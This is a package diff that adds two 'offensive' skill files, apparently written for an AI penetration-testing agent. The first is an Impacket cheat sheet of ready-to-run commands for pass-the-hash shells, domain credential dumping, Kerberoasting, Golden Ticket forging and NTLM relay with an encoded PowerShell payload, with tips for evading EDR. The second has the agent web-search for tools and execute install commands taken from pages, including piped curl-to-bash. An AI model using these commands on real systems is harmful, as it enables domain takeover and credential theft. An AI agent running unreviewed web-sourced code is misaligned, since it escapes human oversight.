@aegis-scan/skills 0.5.0 → 0.5.2

package/skills/offensive/airecon-fork/tools-impacket/SKILL.md

@@ -0,0 +1,227 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: impacket
+description: Impacket toolkit — secretsdump, psexec, wmiexec, smbexec, GetUserSPNs, GetNPUsers, ntlmrelayx, ticketer, and other Windows protocol attack tools in Kali Linux
+---
+
+# Impacket Toolkit
+
+Impacket = Python library implementing Windows protocols (SMB, MSRPC, NTLM, Kerberos, LDAP). Contains standalone scripts for most Windows attack scenarios.
+
+**Install:**
+```
+pip install impacket --break-system-packages
+sudo apt-get install -y impacket-scripts
+# Verify scripts location:
+which secretsdump.py || find /usr -name "secretsdump.py" 2>/dev/null
+# If not in PATH: python3 /path/to/impacket/examples/secretsdump.py
+```
+
+---
+
+## Remote Code Execution Scripts
+
+### psexec.py — SYSTEM Shell via SMB Named Pipe
+
+    # With password:
+    psexec.py domain/username:password@<target>
+    psexec.py administrator:password@<target>
+
+    # Pass-the-Hash:
+    psexec.py administrator@<target> -hashes :<NTLM_hash>
+    psexec.py domain/administrator@<target> -hashes :aad3b435b51404eeaad3b435b51404ee:<NTLM>
+
+    # Run single command:
+    psexec.py administrator:password@<target> cmd.exe /c whoami
+
+    # Note: psexec uploads executable to ADMIN$ share → creates service → loud, detected by EDR
+
+### wmiexec.py — Admin Shell via WMI (Stealthier)
+
+    # With password:
+    wmiexec.py domain/administrator:password@<target>
+    wmiexec.py administrator:password@<target>
+
+    # Pass-the-Hash:
+    wmiexec.py -hashes :<NTLM> administrator@<target>
+
+    # Run command only:
+    wmiexec.py administrator:password@<target> "ipconfig /all"
+
+    # PowerShell mode:
+    wmiexec.py administrator:password@<target> -shell-type powershell
+
+    # Note: no service created, uses WMI → much stealthier than psexec
+
+### smbexec.py — Shell via SMB Service
+
+    # Creates temp service via SCManager — runs as SYSTEM:
+    smbexec.py administrator:password@<target>
+    smbexec.py -hashes :<NTLM> administrator@<target>
+
+### atexec.py — Shell via Task Scheduler
+
+    # Executes command via Windows Task Scheduler:
+    atexec.py administrator:password@<target> "whoami"
+    atexec.py -hashes :<NTLM> administrator@<target> "net user"
+
+### dcomexec.py — Shell via DCOM
+
+    # Uses DCOM (MMC, ShellWindows, ShellBrowserWindow):
+    dcomexec.py administrator:password@<target>
+    dcomexec.py -hashes :<NTLM> administrator@<target>
+    dcomexec.py -object MMC20 administrator:password@<target>
+
+---
+
+## Credential Extraction
+
+### secretsdump.py — Dump All Hashes
+
+    # Remote dump (requires admin rights):
+    secretsdump.py administrator:password@<target>
+    secretsdump.py -hashes :<NTLM> administrator@<target>
+
+    # Domain Controller — dump NTDS.dit (all domain hashes):
+    secretsdump.py domain/administrator:password@<dc_ip>
+    secretsdump.py -hashes :<NTLM> domain/administrator@<dc_ip>
+    secretsdump.py domain/administrator:password@<dc_ip> -just-dc    # Only NTDS, not SAM
+    secretsdump.py domain/administrator:password@<dc_ip> -just-dc-ntlm   # NTLM only
+
+    # Local (offline — from downloaded files):
+    secretsdump.py LOCAL -sam SAM -system SYSTEM
+    secretsdump.py LOCAL -sam SAM -system SYSTEM -security SECURITY
+    secretsdump.py LOCAL -ntds NTDS.dit -system SYSTEM
+
+    # Output format: username:RID:LMhash:NThash:::
+    # LM often aad3b435b51404eeaad3b435b51404ee (empty) — only NT matters
+
+---
+
+## Kerberos Attack Scripts
+
+### GetUserSPNs.py — Kerberoasting
+
+    # List SPNs:
+    GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip>
+
+    # Request TGS tickets (crackable):
+    GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip> -request
+    GetUserSPNs.py domain.local/username:password -dc-ip <dc_ip> -request -outputfile kerberoast.txt
+
+    # With hash:
+    GetUserSPNs.py domain.local/username -hashes :<NTLM> -dc-ip <dc_ip> -request
+
+    # Crack output:
+    hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
+
+### GetNPUsers.py — AS-REP Roasting
+
+    # With user list (no credentials needed):
+    GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -no-pass -dc-ip <dc_ip>
+
+    # With credentials (enumerate vulnerable accounts):
+    GetNPUsers.py domain.local/username:password -request -format hashcat -dc-ip <dc_ip>
+
+    # Crack:
+    hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
+
+### getTGT.py — Get TGT Ticket
+
+    # From password:
+    getTGT.py domain.local/username:password -dc-ip <dc_ip>
+
+    # From NTLM hash (Overpass-the-Hash):
+    getTGT.py domain.local/username -hashes :<NTLM> -dc-ip <dc_ip>
+
+    # From AES key:
+    getTGT.py domain.local/username -aesKey <AES256_key> -dc-ip <dc_ip>
+
+    # Output: username.ccache
+    export KRB5CCNAME=username.ccache
+    # Use with any -k -no-pass impacket tool
+
+### ticketer.py — Golden/Silver Ticket
+
+    # Golden Ticket:
+    ticketer.py -nthash <krbtgt_NTLM> -domain-sid S-1-5-21-xxx -domain domain.local Administrator
+    # Silver Ticket (specific service):
+    ticketer.py -nthash <service_NTLM> -domain-sid S-1-5-21-xxx -domain domain.local \
+      -spn cifs/<server>.domain.local Administrator
+
+    # Use:
+    export KRB5CCNAME=Administrator.ccache
+    psexec.py -k -no-pass Administrator@<target>
+
+---
+
+## NTLM Relay Attack
+
+### ntlmrelayx.py — Relay NTLM Auth to Other Systems
+
+    # Relay to SMB (dump SAM automatically):
+    ntlmrelayx.py -tf relay_targets.txt -smb2support
+
+    # With command execution:
+    ntlmrelayx.py -tf relay_targets.txt -smb2support -c "powershell -enc <b64>"
+
+    # Relay to HTTP (LDAP):
+    ntlmrelayx.py -tf relay_targets.txt -smb2support --delegate-access  # AD CS attack
+
+    # Combine with Responder (capture NTLM):
+    # Edit /etc/responder/Responder.conf → SMB=Off, HTTP=Off
+    sudo responder -I eth0 -dwP &
+    ntlmrelayx.py -tf targets.txt -smb2support -i  # -i = interactive shell
+
+---
+
+## SMB Enumeration
+
+### lookupsid.py — SID Enumeration
+
+    # Enumerate users via SID brute force (null session):
+    lookupsid.py domain.local/guest@<target>
+    lookupsid.py anonymous@<target>
+
+### rpcdump.py — RPC Endpoints
+
+    rpcdump.py <target>
+    rpcdump.py domain/username:password@<target>
+
+### samrdump.py — SAMR Protocol Enumeration
+
+    samrdump.py <target>
+    samrdump.py domain/username:password@<target>
+    # Lists users, groups, shares
+
+---
+
+## LDAP Queries
+
+### ldapdomaindump.py — Full LDAP Dump
+
+    # pip install ldapdomaindump --break-system-packages
+    ldapdomaindump -u 'domain\username' -p 'password' <dc_ip> -o output/ldap/
+    # Creates: domain_users.json, domain_computers.json, domain_groups.json, domain_policy.json
+
+---
+
+## Pro Tips
+
+1. `secretsdump.py` on any admin box = instant credential harvest; on DC = entire domain
+2. `wmiexec.py` > `psexec.py` for stealth — no service creation, harder to detect
+3. Chain: `GetNPUsers.py` (no creds) → crack → `GetUserSPNs.py` → crack service accounts → admin
+4. `lookupsid.py guest@target` = null session user enumeration on many AD environments
+5. `ntlmrelayx.py -i` = interactive SMB shell on relay target without any reverse payload
+6. Always try `-hashes :<NTLM>` — most impacket scripts support pass-the-hash natively
+
+## Summary
+
+Impacket priority order:
+1. `secretsdump.py` (admin creds/hash) → all credentials
+2. `GetNPUsers.py` (user list, no creds) → AS-REP roast → crack → initial foothold
+3. `GetUserSPNs.py` (any domain user) → Kerberoast → crack → service account
+4. `wmiexec.py` (stealthy) or `psexec.py` (SYSTEM) → remote execution
+5. `ntlmrelayx.py` → relay captured NTLM auth to high-value targets
+6. `ticketer.py` (krbtgt hash) → Golden Ticket → permanent DA access

package/skills/offensive/airecon-fork/tools-install/SKILL.md

@@ -0,0 +1,202 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+## INSTALL STRATEGY (HEADLESS + SKILL-AWARE)
+
+Before running recon/exploit workflows, pick a toolchain profile and verify tools first.
+
+### STEP 0 — Pick Toolchain Profile
+
+  [Web/API baseline]
+    nmap, httpx, katana, ffuf, nuclei, sqlmap, dalfox
+
+  [Source review / SAST]
+    semgrep, bandit, trivy, eslint, jshint
+
+  [Internal / AD]
+    netexec, smbclient, enum4linux-ng, impacket, kerbrute
+
+  [CTF binary/reverse]
+    checksec, strings, objdump, radare2, ropper, pwntools
+
+  [Mobile Android APK]
+    apktool, jadx, apksigner, apkleaks, apkid, adb, frida-tools, objection
+
+  [Mobile iOS IPA (headless static)]
+    unzip, plistutil/plutil, strings, radare2, otool (if available)
+    NOTE: full iOS dynamic testing is usually outside this Docker runtime.
+
+### STEP 0.1 — Verify Before Install
+
+  Use this for every required binary:
+    which <tool> && (<tool> --version || <tool> --help)
+
+  If missing, install immediately using the protocol below.
+
+### STEP 0.2 — GUI Constraint
+
+  If a workflow requires GUI-only tooling, switch to CLI alternatives first.
+  Examples:
+    - jadx-gui -> jadx (CLI output dir)
+    - Burp GUI -> caido-cli / curl replay / http framework
+    - MobSF web UI -> static CLI chain (apktool + jadx + apkleaks + apkid)
+
+## TOOL MISSING — AUTO-INSTALL PROTOCOL:
+
+When a command returns "command not found" or `which <tool>` returns empty:
+
+### STEP 1 — Try known install methods first (fastest):
+
+  [Standard Kali tools]:
+    → sudo apt-get update && sudo apt-get install -y <tool>
+    → OR: go install github.com/projectdiscovery/<tool>/cmd/<tool>@latest
+
+  [Python tools]:
+    → pip install <tool> --break-system-packages (try the exact package name first)
+    → If pip name differs from binary name: web_search "<tool> pip install"
+    → Example: metagoofil → pip install metagoofil
+    → Example: porch-pirate → pip install porch-pirate
+    → Example: postleaksNg → pip install postleaks-ng
+    → Example: corsy → pip install corsy
+
+  [Go tools]:
+    → go install github.com/<author>/<tool>/cmd/<tool>@latest
+    → OR: which go || sudo apt-get install -y golang-go
+
+  [GitHub tools]:
+    1. web_search "<tool> github install" to find exact repo URL
+    2. git clone <repo_url> /home/pentester/tools/<tool>/
+    3. cd /home/pentester/tools/<tool>/
+    4. pip install -r requirements.txt  OR  npm install  OR  make
+    5. Run via: python3 /home/pentester/tools/<tool>/<script>.py
+
+### STEP 2 — If STEP 1 fails or tool is unknown: WEB SEARCH + READ URL
+
+When apt/pip/go install fails, or you don't know where the tool is published:
+
+  MANDATORY FLOW:
+    1. web_search("<tool name> install kali linux")
+       OR web_search("<tool name> github")
+       OR web_search("<tool name> installation guide")
+
+    2. From the search results, identify the most relevant URL:
+       - Prefer: official GitHub repo (github.com/author/tool)
+       - Prefer: official documentation site
+       - Avoid: random blog posts (use only if no official source found)
+
+    3. Open the URL using browser_action to read the full installation instructions:
+       browser_action(action="navigate", url="<url_from_search_results>")
+       # Read the README, Installation section, or docs page
+       # Look for: "Installation", "Install", "Getting Started", "Usage"
+
+    4. Extract the exact install commands from the page:
+       # Common patterns to look for:
+       # go install ...
+       # pip install ...
+       # apt-get install ...
+       # wget ... && chmod +x ...
+       # git clone ... && cd ... && make
+       # curl -sSL ... | bash
+
+    5. Execute the extracted install commands in the Docker Kali sandbox
+
+    6. Verify install succeeded:
+       which <tool>
+       <tool> --version  OR  <tool> --help
+
+  EXAMPLE WORKFLOW:
+    # Tool "feroxbuster" not found:
+    web_search("feroxbuster install kali linux")
+    # Gets result: https://github.com/epi052/feroxbuster
+    browser_action(action="navigate", url="https://github.com/epi052/feroxbuster")
+    # Reads: "curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/main/install-nix.sh | bash"
+    # Executes that command
+    which feroxbuster  # confirms install
+
+### STEP 3 — If tool still not installable:
+
+  Fall back to equivalent alternative:
+    - feroxbuster / gobuster → use ffuf (already installed)
+    - masscan → use nmap --min-rate 5000
+    - enum4linux → use enum4linux-ng
+    - netcat → use ncat or socat
+    - python2 tool → try python3 with 2to3 conversion
+
+  Document the fallback: note which tool was unavailable and what was used instead.
+
+  [Known installs for new Phase 1 tools]:
+    metagoofil      → pip install metagoofil --break-system-packages
+    porch-pirate    → pip install porch-pirate --break-system-packages
+    postleaksNg     → git clone https://github.com/cosad3s/postleaksNg /home/pentester/tools/postleaksNg && pip install -r /home/pentester/tools/postleaksNg/requirements.txt --break-system-packages
+    SwaggerSpy      → git clone https://github.com/UndeadSec/SwaggerSpy /home/pentester/tools/SwaggerSpy && pip install -r /home/pentester/tools/SwaggerSpy/requirements.txt --break-system-packages
+    alterx          → go install github.com/projectdiscovery/alterx/cmd/alterx@latest
+    shuffledns      → go install github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
+    puredns         → go install github.com/d3mondev/puredns/v2@latest
+    vita            → go install github.com/junnlikestea/vita@latest
+    shosubgo        → go install github.com/incogbyte/shosubgo@latest
+    github-subdomains → go install github.com/gwen001/github-subdomains@latest
+    chaos           → go install github.com/projectdiscovery/chaos-client/cmd/chaos@latest
+    findomain       → sudo apt-get install -y findomain  OR  cargo install findomain
+    waymore         → pip install waymore --break-system-packages
+    uro             → pip install uro --break-system-packages
+    kiterunner      → wget https://github.com/assetnote/kiterunner/releases/latest/download/kr_linux_amd64 -O /usr/local/bin/kr && chmod +x /usr/local/bin/kr
+    corsy           → pip install corsy --break-system-packages
+    cariddi         → go install github.com/edoardottt/cariddi/cmd/cariddi@latest
+    ghauri          → pip install ghauri --break-system-packages
+    retire          → npm install -g retire
+    hakrawler       → go install github.com/hakluke/hakrawler@latest
+    interactsh-client → go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
+    toxicache       → go install github.com/OJ/gobuster/v3@latest  (different, check first)
+    nosqli          → pip install nosqli --break-system-packages
+    headi           → go install github.com/mlcsec/headi@latest
+    crlfuzz         → go install github.com/dwisiswant0/crlfuzz/cmd/crlfuzz@latest
+    nrich           → go install github.com/projectdiscovery/nrich/cmd/nrich@latest
+    asnmap          → go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
+    mapcidr         → go install github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest
+    dnsx            → go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
+    subfinder       → go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
+    kerbrute        → go install github.com/ropnop/kerbrute@latest  OR  wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O /usr/local/bin/kerbrute && chmod +x /usr/local/bin/kerbrute
+    ROPgadget       → pip install ropgadget --break-system-packages
+    pwntools        → pip install pwntools --break-system-packages
+    pwndbg          → git clone https://github.com/pwndbg/pwndbg /home/pentester/tools/pwndbg && cd /home/pentester/tools/pwndbg && ./setup.sh
+    impacket        → pip install impacket --break-system-packages  OR  sudo apt-get install -y impacket-scripts
+    evil-winrm      → sudo gem install evil-winrm  OR  sudo apt-get install -y evil-winrm
+    crackmapexec    → sudo apt-get install -y crackmapexec  OR  pip install netexec --break-system-packages
+    pypykatz        → pip install pypykatz --break-system-packages
+    ldapdomaindump  → pip install ldapdomaindump --break-system-packages
+    chisel          → wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz -O /tmp/c.gz && gunzip /tmp/c.gz && mv /tmp/c /home/pentester/tools/chisel && chmod +x /home/pentester/tools/chisel
+    ligolo-ng       → wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/proxy_linux_amd64 -O /home/pentester/tools/ligolo-proxy && chmod +x /home/pentester/tools/ligolo-proxy; wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/agent_linux_amd64 -O /home/pentester/tools/ligolo-agent && chmod +x /home/pentester/tools/ligolo-agent
+    linpeas         → wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /home/pentester/tools/linpeas.sh && chmod +x /home/pentester/tools/linpeas.sh
+    winpeas         → wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O /home/pentester/tools/winpeas.exe
+    GodPotato       → wget https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe -O /home/pentester/tools/GodPotato.exe
+    PrintSpoofer    → wget https://github.com/itm4n/PrintSpoofer/releases/latest/download/PrintSpoofer64.exe -O /home/pentester/tools/PrintSpoofer64.exe
+    RsaCtfTool     → git clone https://github.com/RsaCtfTool/RsaCtfTool /home/pentester/tools/RsaCtfTool && pip install -r /home/pentester/tools/RsaCtfTool/requirements.txt --break-system-packages
+    stegseek        → wget https://github.com/RickdeJager/stegseek/releases/latest/download/stegseek_0.6-1.deb -O /tmp/stegseek.deb && sudo dpkg -i /tmp/stegseek.deb
+    volatility3     → pip install volatility3 --break-system-packages  OR  sudo apt-get install -y volatility3
+    nosqlmap        → git clone https://github.com/codingo/NoSQLMap /home/pentester/tools/nosqlmap && pip install -r /home/pentester/tools/nosqlmap/requirements.txt --break-system-packages
+    enum4linux-ng   → sudo apt-get install -y enum4linux-ng  OR  pip install enum4linux-ng --break-system-packages
+    hash-identifier → sudo apt-get install -y hash-identifier
+    hashid          → pip install hashid --break-system-packages
+    cewl            → sudo apt-get install -y cewl
+    snmp-check      → sudo apt-get install -y snmp-check
+    onesixtyone     → sudo apt-get install -y onesixtyone
+    dnsrecon        → sudo apt-get install -y dnsrecon
+    dnsenum         → sudo apt-get install -y dnsenum
+    fierce          → sudo apt-get install -y fierce
+    dnsgen          → pip install dnsgen --break-system-packages
+    padbuster       → sudo apt-get install -y padbuster
+    apktool         → sudo apt-get install -y apktool
+    jadx            → sudo apt-get install -y jadx
+    apksigner       → sudo apt-get install -y apksigner
+    adb             → sudo apt-get install -y adb fastboot  OR  sudo apt-get install -y android-sdk-platform-tools
+    apkleaks        → pip install apkleaks --break-system-packages
+    apkid           → pip install apkid --break-system-packages
+    frida-tools     → pip install frida-tools --break-system-packages
+    objection       → pip install objection --break-system-packages
+    mobsf           → docker pull opensecurity/mobile-security-framework-mobsf && docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf  (if Docker-in-Docker available)
+    oletools        → pip install oletools --break-system-packages
+    stegoveritas    → pip install stegoveritas --break-system-packages
+    zsteg           → sudo gem install zsteg
+    ropper          → pip install ropper --break-system-packages  OR  sudo apt-get install -y ropper
+    r2ghidra        → r2pm -ci r2ghidra   (inside radare2 after: sudo apt-get install -y radare2)
+    metasploit      → sudo apt-get install -y metasploit-framework && sudo msfdb init
+---